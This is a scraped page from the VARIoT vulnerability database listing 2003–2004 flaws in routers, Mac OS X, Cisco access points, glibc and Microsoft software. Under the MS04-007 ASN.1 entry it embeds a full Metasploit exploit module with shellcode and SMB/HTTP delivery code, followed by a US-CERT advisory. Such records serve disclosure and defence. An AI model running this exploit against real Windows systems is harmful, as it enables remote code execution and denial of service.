VARIoT IoT vulnerabilities database

VAR-200312-0279 CVE-2003-1005 Integer overflow vulnerability in rsync CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The PKI functionality in Mac OS X 10.2.8 and 10.3.2 allows remote attackers to cause a denial of service (service crash) via malformed ASN.1 sequences. Some versions of the rsync program contain a remotely exploitable vulnerability. This vulnerability may allow an attacker to execute arbitrary code on the target system. This could potentially lead to an attacker crashing a service that uses an implementation of the vulnerable software. This issue is reported to be similar to OpenSSL ASN.1 Large Recursion Remote Denial Of Service Vulnerability described in BID 8970. Due to a lack of details further information concerning this issue cannot be provided at the moment. This BID will be updated as more information becomes available. Mac OS X is an operating system used on Mac machines, based on the BSD system. No detailed vulnerability details are currently available
VAR-200312-0519 No CVE Apache mod_userdir module information disclosure vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The Apache module mod_userdir allows access to a user's website directory using a syntax such as http://example.com/~user/. The default installation configuration of Apache mod_userdir is not secure, and remote attackers can exploit this vulnerability to obtain sensitive information. An attacker can use the mod_userdir misconfiguration to enumerate sensitive information such as the usernames present on the host, and use this information to further attack the system. It is reported that the Apache mod_userdir module is prone to an information disclosure vulnerability. The issue is reported to exist because the module is configured in an insecure manner by default. It is reported that an attacker may exploit this vulnerability to harvest user account names that are present on the affected host
VAR-200312-0518 No CVE Linksys WRT54G Router Empty HTTP GET Request Remote Denial of Service Attack Vulnerability CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
The Linksys WRT54G Router is a router device. The Linksys WRT54G Router does not properly handle some GET requests, and a remote attacker can exploit this vulnerability to restart the router. Sending an empty GET request to the embedded web server listening on port 80 causes the router to restart, resulting in a denial of service. It has been reported that when the affected appliance handles a request of this type the embedded web server will halt, requiring the appliance to be power cycled in order to regain normal functionality
VAR-200312-0516 No CVE Cisco Aironet AP SNMP trap leaks WEP key vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Cisco Aironet Access Points are wireless access points. A vulnerability in Cisco Aironet Access Points running Cisco IOS could result in the disclosure of WEP key information. When the 'snmp-server enable traps wlan-wep' command is set on Cisco Aironet Access Points, AP devices running Cisco IOS software send WEP keys to the SNMP server in clear text. The affected hardware models include the Cisco Aironet 1100, 1200, and 1400 series. This command is disabled by default. Cisco Aironet AP models running VxWorks are not affected by this vulnerability. To determine whether an AP is running Cisco IOS software, telnet to the AP's address: if a plain prompt such as apl200% is displayed instead of a graphical interface, the AP is running IOS software
VAR-201401-0580 No CVE Cisco Aironet AP SNMP trap leaking WEP key vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Cisco Aironet Access Points are wireless access points. A vulnerability exists in Cisco Aironet Access Points running Cisco IOS that could result in the disclosure of WEP key information. When the 'snmp-server enable traps wlan-wep' command is set on Cisco Aironet Access Points, AP devices running Cisco IOS Software send the WEP key to the SNMP server in clear text. The affected hardware models include the Cisco Aironet 1100, 1200, and 1400 series; the command is turned off by default. Cisco Aironet AP models running VxWorks are not affected by this vulnerability. To determine whether an AP is running Cisco IOS software, telnet to the AP's address: if a plain prompt such as apl200% is displayed instead of a graphical interface, the AP is running IOS software. The issue has been reported to exist only if the 'snmp-server enable traps wlan-wep' command has been set
VAR-200311-0100 No CVE Route Detection Security Tool Remote Format String Processing Vulnerability CVSS V2: 9.4
CVSS V3: -
Severity: HIGH
Detecttr.c is a route detection program. Due to a lack of adequate checking of hostnames, remote attackers can exploit detecttr.c for format string attacks, which may result in arbitrary instructions being executed on the system with the privileges of the process. The problem is that detecttr.c passes the hostname directly to the syslog() function as the format string, without proper format string checking. When the entry is written to the log file, this can corrupt memory, and carefully constructed input may execute arbitrary instructions on the system with the privileges of the process. A remote format string vulnerability has been discovered in the detecttr.c traceroute detection tool, initially released in Phrack magazine. Successful exploitation of this issue could allow an attacker to execute arbitrary code on a vulnerable system with the privileges of the user invoking detecttr
VAR-200311-0101 No CVE HP ProCurve Switch Remote Denial of Service Attack Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The HP ProCurve Switch is an enterprise network switch. The HP ProCurve Switch has problems handling traffic from RPC worms such as W32.Welchia.Worm (MCID 1811) and W32.Blaster.Worm (MCID 1761), causing the switch to stop responding to normal requests and resulting in a denial of service. No detailed vulnerability information is currently available. This issue is reported to result in degraded network traffic and a denial of service condition for end users
VAR-200403-0083 CVE-2003-1009 Apple MacOS X DHCP Answer ROOT Permission access vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Directory Services in Apple Mac OS X 10.0.2, 10.0.3, 10.2.8, 10.3.2 and Apple Mac OS X Server 10.2 through 10.3.2 accepts authentication server information from unknown LDAP or NetInfo sources as provided by a malicious DHCP server, which allows remote attackers to gain privileges. It has been reported that Apple MacOS X may be prone to a vulnerability that may allow an attacker to gain root access to a vulnerable system via DHCP responses. It has been reported that systems running MacOS X attempt to negotiate DHCP on all available interfaces. If a network is not found, and that system is implementing the use of wireless connectivity, then that system will attempt to connect to any network in order to obtain an address. The system will also attempt to connect to an LDAP or NetInfo server on the network by using DHCP provided fields. The vulnerable host is reported to implicitly trust the server for correct information. It has also been reported that an attacker may set up a malicious server and thereby be able to login to a vulnerable system using any login name and a user id (uid) of 0 in response to DHCP lease requests. Mac OS X is an operating system used on Mac machines, based on the BSD system. The "Directory Access" default setting on systems affected by this vulnerability blindly uses and trusts the DHCP fields provided by these servers, and the system does not prevent logins by any account with uid 0. For example, if an LDAP or NetInfo server contains a user named "bluemeanie" with uid 0, the system will not check that account at the login window or at any network-provided service such as SSH. In most cases, the Mac would need to boot into a malicious environment to exploit this vulnerability (the netinfod process would have to be restarted to insert the malicious server into its list of authenticated resources)
VAR-200311-0102 No CVE Thomson SpeedTouch DSL Router Port Scanning Denial of Service Attack Vulnerability CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
The Thomson SpeedTouch DSL is a broadband router. Thomson SpeedTouch DSL has problems handling some special types of traffic, and remote attackers can exploit this vulnerability to perform denial of service attacks on the device. When an attacker performs a large-scale port scan of a Thomson SpeedTouch DSL router, the device stops responding, causing a denial of service. An attacker can use a scanner such as Nmap or Nessus to perform the scan. A problem has been reported in SpeedTouch DSL routers when routing certain types of traffic. Because of this, it may be possible to deny service to legitimate users of a vulnerable router
VAR-200312-0278 CVE-2003-1085 Thomson Cable Modem Remote Denial of Service Attack Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The HTTP server in the Thomson TWC305, TWC315, and TCW690 cable modem ST42.03.0a allows remote attackers to cause a denial of service (unstable service) via a long GET request, possibly caused by a buffer overflow. A problem has been identified in Thomson Cable Modems when handling long requests on the HTTP port. Because of this, it may be possible for an attacker to deny service to legitimate users of the device. The Thomson TCM315 is a broadband cable modem device
VAR-200312-0223 CVE-2003-0856 Red Hat Linux of iproute Service disruption in (DoS) Vulnerabilities CVSS V2: 4.9
CVSS V3: -
Severity: MEDIUM
iproute 2.4.7 and earlier allows local users to cause a denial of service via spoofed messages as other users to the kernel netlink interface. iproute, included in Red Hat Linux, does not properly check messages received via the Linux Netlink interface, so a forged message received via the Netlink interface is accepted. A command included in the iproute package may thereby be placed in a denial of service (DoS) state. A problem has been discovered in iproute when handling messages from the kernel. Because of this, it may be possible for an attacker to deny service to legitimate users of a system. iproute is an advanced IP routing and network device configuration tool. No detailed vulnerability details are currently available
VAR-200312-0239 CVE-2003-0975 Apple Safari Web Browser Null character Cookie Stealing vulnerabilities CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Apple Safari 1.0 through 1.1 on Mac OS X 10.3.1 and Mac OS X 10.2.8 allows remote attackers to steal user cookies from another domain via a link with a hex-encoded null character (%00) followed by the target domain. An issue has been discovered in Apple Safari, which may allow an attacker to steal cookie-based authentication credentials from a user of a vulnerable web browser. The problem is in the handling of NULL (%00) characters in URLs. This issue may only be exploited to steal cookies set for a domain, as opposed to cookies set for a specific host in that domain. Cookies set with the secure flag can be stolen if the attacker uses SSL. Apple Safari is a web browser for Apple systems. Remote attackers can exploit this vulnerability by constructing malicious URLs, luring users to visit them, and stealing sensitive cookie information. If the Apple Safari browser loads a URL such as http://alive.znep.com\%00www.passport.com/cgi-bin/cookies, Safari connects to the host before the "\%00" but sends cookies to that server based on the entire hostname. This problem can be used to steal the cookie information for a specific path, and by using a specific path and SSL in the request URL it can also steal cookies that carry the secure flag
VAR-200311-0047 CVE-2003-0875 OpenSLP slpd script slpd.all_init Symbolic link vulnerability CVSS V2: 2.1
CVSS V3: -
Severity: LOW
Symbolic link vulnerability in the slpd script slpd.all_init for OpenSLP before 1.0.11 allows local users to overwrite arbitrary files via the route.check temporary file
VAR-200311-0103 No CVE FortiGate Firewall Web Interface Cross-Site Scripting Vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
The FortiGate Firewall is a hardware firewall solution. The web interface included in the FortiGate firewall does not adequately filter URL requests. Remote attackers can exploit this vulnerability for cross-site scripting attacks, which can lead to the disclosure of sensitive information. Multiple scripts on the FortiGate firewall's web interface do not adequately filter URI parameters. If parameters containing malicious script code are submitted, then when the administrator views the resulting logs in a browser, the script may execute in the browser and leak the username and MD5 password hash, which can be used to further attack the system. These issues could be exploited by enticing an administrative user to follow a malicious link that includes hostile HTML and script code as values for URI parameters. If such a link is followed, the hostile code may be rendered in the administrator's browser
VAR-200312-0226 CVE-2003-0859 GNU libc of getifaddrs() Service disruption in functions (DoS) Vulnerabilities CVSS V2: 4.9
CVSS V3: -
Severity: MEDIUM
The getifaddrs function in GNU libc (glibc) 2.2.4 and earlier allows local users to cause a denial of service by sending spoofed messages as other users to the kernel netlink interface. Applications which make use of the kernel Netlink interface are said to be prone to denial of service attacks. It has been reported that applications implementing the getifaddrs() glibc function may be prone to denial of service attacks. The problem is said to occur due to the way getifaddrs() interacts with the netlink device. Under some circumstances, an anonymous netlink message handled by the getifaddrs() function may cause the application to crash. Red Hat has stated that GNU Zebra, Quagga and iproute are also affected by this vulnerability due to the way they interact with the netlink interface; exploitation may result in a denial of service. The precise technical details regarding this issue are currently unknown. This BID will be updated, as further information is made available. kernel Netlink is a network interface implementation
VAR-200312-0227 CVE-2003-0795 GNU Zebra Undefined in Telnet Service operation disruption due to connection options (DoS) Vulnerabilities CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The vty layer in Quagga before 0.96.4, and Zebra 0.93b and earlier, does not verify that sub-negotiation is taking place when processing the SE marker, which allows remote attackers to cause a denial of service (crash) via a malformed telnet command to the telnet CLI port, which may trigger a null dereference. In GNU Zebra, when a password is set and a telnet connection to the zebra module's management port is established, sending an undefined code that does not exist as a telnet option causes a segmentation violation that crashes the zebra daemon. The zebra daemon may thereby be placed in a denial of service (DoS) state. It has been reported that Zebra, as well as Quagga, may be vulnerable to a remote denial of service vulnerability that may allow an attacker to cause the software to crash or hang. The issue is reported to occur if an attacker attempts to connect to the Zebra telnet management port while a password is enabled. The program will crash when attempting to dereference an invalid, possibly NULL, pointer. All versions of GNU Zebra are said to be vulnerable to this issue. All versions of Quagga prior to 0.96.4 are also vulnerable
VAR-200403-0051 CVE-2003-0818 Microsoft ASN.1 Library improperly decodes constructed bit strings CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. The Microsoft Windows ASN.1 Library (msasn1.dll) has an integer overflow vulnerability through which arbitrary code may be executed remotely. A remote third party may execute arbitrary code with SYSTEM privileges. As a result, it is possible to gain administrative privileges on vulnerable systems. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contains another nested constructed bit string. This vulnerability is exposed in a number of security related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications which use the library will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates such as Internet Explorer and Outlook. Handling of signed ActiveX components could also present an exposure. It should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable.
Issues related to this vulnerability were originally covered in BID 9626 and 9743; further information has been made available which identifies that this is a distinct vulnerability in the library, and so this specific issue has been assigned an individual BID. ** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available. This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data. This could result in an excessive value being used in a heap allocation routine, allowing for large amounts of heap memory to be corrupted. This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code. Exploitation of this issue will result in the corruption of heap based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft ASN.1 Library Bitstring Heap Overflow',
			'Description'    => %q{
				This is an exploit for a previously undisclosed vulnerability
				in the bit string decoding code in the Microsoft ASN.1 library.
				Both vulnerabilities were fixed in the MS04-007 patch.
				You are only allowed one attempt with this vulnerability. If the
				payload fails to execute, the LSASS system service will crash and
				the target system will automatically reboot itself in 60 seconds.
				If the payload succeeeds, the system will no longer be able to
				process authentication requests, denying all attempts to login
				through SMB or at the console. A reboot is required to restore
				proper functioning of an exploited system.
				This exploit has been successfully tested with the win32/*/reverse_tcp
				payloads, however a few problems were encounted when using the
				equivalent bind payloads. Your mileage may vary.
			},
			'Author'         => [ 'Solar Eclipse <solareclipse@phreedom.org>' ],
			'License'        => GPL_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0818'],
					[ 'OSVDB', '3902' ],
					[ 'BID', '9633'],
					[ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],
					[ 'MSB', 'MS04-007'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'           => 1024,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
						{
							'Platform' => 'win',
						},
					],
				],
			'DisclosureDate' => 'Feb 10 2004',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('PROTO', [ true, "Which protocol to use: http or smb", 'smb']),
			], self.class)
	end

	# This exploit is too destructive to use during automated exploitation.
	# Better Windows-based exploits exist at this time (Sep 2006)
	def autofilter
		false
	end

	# This is a straight port of Solar Eclipse's "kill-bill" exploit, published
	# as a Metasploit Framework module with his permission. This module is only
	# licensed under GPLv2, keep this in mind if you embed the Framework into
	# a non-GPL application.
	#   -hdm[at]metasploit.com
	def exploit

		# The first stage shellcode fixes the PEB pointer and cleans the heap
		stage0 =
			"\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
			"\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
			"\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
			"\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
			"\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
			"\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
			"\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
			"\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
			"\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
			"\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
			"\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
			"\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
			"\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
			"\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
			"\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
			"\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
			"\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
			"\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
			"\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
			"\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
			"\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
			"\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
			"\x08\x00\xeb\xfe"

		token = spnego_token(stage0, payload.encoded)

		case datastore['PROTO']
		when 'smb'
			exploit_smb(token)
		when 'http'
			exploit_http(token)
		else
			print_status("Invalid application protocol specified, use smb or http")
		end
	end

	def exploit_smb(token)
		connect

		client = Rex::Proto::SMB::Client.new(sock)

		begin
			client.session_request(smb_hostname()) if not datastore['SMBDirect']
			client.negotiate
			client.session_setup_ntlmv2_blob(token)
		rescue => e
			if (e.to_s =~ /error code 0x00050001/)
				print_status("The target system has already been exploited")
			else
				print_status("Error: #{e}")
			end
		end

		handler
		disconnect
	end

	def exploit_http(token)
		connect

		req  = "GET / HTTP/1.0\r\n"
		req << "Host: #{ datastore['RHOST']}\r\n"
		req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"
		sock.put(req)

		res = sock.get_once

		if (res and res =~ /0x80090301/)
			print_status("This server does not support the Negotiate protocol or has already been exploited")
		end

		if (res and res =~ /0x80090304/)
			print_status("This server responded with error code 0x80090304 (wth?)")
		end

		handler
		disconnect
	end

	# Returns an ASN.1 encoded string
	def enc_asn1(str)
		Rex::Proto::SMB::Utils::asn1encode(str)
	end

	# Returns an ASN.1 encoded bit string with 0 unused bits
	def enc_bits(str)
		"\x03" + enc_asn1("\x00" + str)
	end

	# Returns a BER encoded constructed bit string
	def enc_constr(*str_arr)
		"\x23" + enc_asn1(str_arr.join(''))
	end

	# Returns a BER encoded SPNEGO token
	def spnego_token(stage0, stage1)

		if !(stage0 and stage1)
			print_status("Invalid parameters passed to spnego_token")
			return
		end

		if (stage0.length > 1032)
			print_status("The stage 0 shellcode is longer than 1032 bytes")
			return
		end

		tag = "\x90\x42\x90\x42\x90\x42\x90\x42"

		if ((tag.length + stage1.length) > 1033)
			print_status("The stage 1 shellcode is too long")
			return
		end

		# The first two overwrites must succeed, so we write to an unused location
		# in the PEB block. We don't care about the values, because after this the
		# doubly linked list of free blocks is corrupted and we get to the second
		# overwrite which is more useful.
		fw = "\xf8\x0f\x01\x00" # 0x00010ff8
		bk = "\xf8\x0f\x01"

		# The second overwrite writes the address of our shellcode into the
		# FastPebLockRoutine pointer in the PEB
		peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB

		bitstring =
			enc_constr(
				enc_bits("A" * 1024),
				"\x03\x00",
				enc_constr(
					enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))),
					enc_constr(
						enc_bits(fw + bk)
					),
					enc_constr(
						enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))),
						enc_constr(
							enc_bits("\xeb\x06" + make_nops(6)),
							enc_bits("D" * 1040)
						)
					)
				)
			)

		token =
			"\x60" + enc_asn1(                             # Application Constructed Object
				"\x06\x06\x2b\x06\x01\x05\x05\x02" +        # SPNEGO OID
				"\xa0" + enc_asn1(                         # NegTokenInit (0xa0)
					"\x30" + enc_asn1(
						"\xa1" + enc_asn1(
							bitstring
						)
					)
				)
			)

		return token
	end

end

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Multiple Vulnerabilities in Microsoft ASN.1 Library

Original issue date: February 10, 2004
Last revised: --
Source: US-CERT

A complete revision history is at the end of this document.

According to information from eEye Digital Security, the vulnerabilities involve integer overflows and other flaws in integer arithmetic. Any application that loads the ASN.1 library could serve as an attack vector. In particular, ASN.1 is used by a number of cryptographic and authentication services such as digital certificates (x.509), Kerberos, NTLMv2, SSL, and TLS. Both client and server systems are affected. The Local Security Authority Subsystem (lsass.exe) and a component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1 library.

Solution

Apply a patch

Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-007.

Vendor Information

This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments.

Microsoft

Please see Microsoft Security Bulletin MS04-007.

References

  * Vulnerability Note VU#216324 - <http://www.kb.cert.org/vuls/id/216324>
  * Vulnerability Note VU#583108 - <http://www.kb.cert.org/vuls/id/583108>
  * eEye Digital Security Advisory AD20040210 - <http://www.eeye.com/html/Research/Advisories/AD20040210.html>
  * eEye Digital Security Advisory AD20040210-2 - <http://www.eeye.com/html/Research/Advisories/AD20040210-2.html>
  * Microsoft Security Bulletin MS04-007 - <http://microsoft.com/technet/security/bulletin/MS04-007.asp>
  * Microsoft Knowledge Base Article 252648 - <http://support.microsoft.com/default.aspx?scid=252648>

_________________________________________________________________

These vulnerabilities were researched and reported by eEye Digital Security. Information from eEye and Microsoft was used in this document.

_________________________________________________________________

Feedback can be directed to the author, Art Manion.

Copyright 2004 Carnegie Mellon University.

Revision History

February 10, 2004: Initial release

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQFAKVrdXlvNRxAkFWARAuOvAJwL2gJJPBRdrtZ0Le4yyLQLu7CHewCgvaCW
5hU8LQ/oOC4sI8PpnkppCyg=
=Oe/N
-----END PGP SIGNATURE-----
VAR-200312-0216 CVE-2003-0824 Microsoft FrontPage Server Extensions contains denial of service vulnerability in the SmartHTML interpreter CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Unknown vulnerability in the SmartHTML interpreter (shtml.dll) in Microsoft FrontPage Server Extensions 2000 and 2002, and Microsoft SharePoint Team Services 2002, allows remote attackers to cause a denial of service (response failure) via a certain request. This issue could be exploited to deny availability of CPU resources on the system, potentially causing a denial of service condition
VAR-200312-0215 CVE-2003-0822 Microsoft FrontPage Server Extensions contains denial of service vulnerability in the SmartHTML interpreter CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Buffer overflow in the debug functionality in fp30reg.dll of Microsoft FrontPage Server Extensions (FPSE) 2000 and 2002 allows remote attackers to execute arbitrary code via a crafted chunked encoded request. It is possible to trigger this condition with a chunked-encoded HTTP POST request
VAR-200312-0266 CVE-2003-0913 Apple MacOS X Terminal unauthorized access vulnerability CVSS V2: 4.6
CVSS V3: -
Severity: MEDIUM
Unknown vulnerability in the Terminal application for Mac OS X 10.3 (Client and Server) may allow "unauthorized access". The precise technical details regarding this issue are currently unknown; however, it is believed that a local user may exploit a flaw in Terminal to possibly gain elevated privileges. Mac OS X is an operating system used on Mac machines, based on the BSD system. No detailed vulnerability details are currently available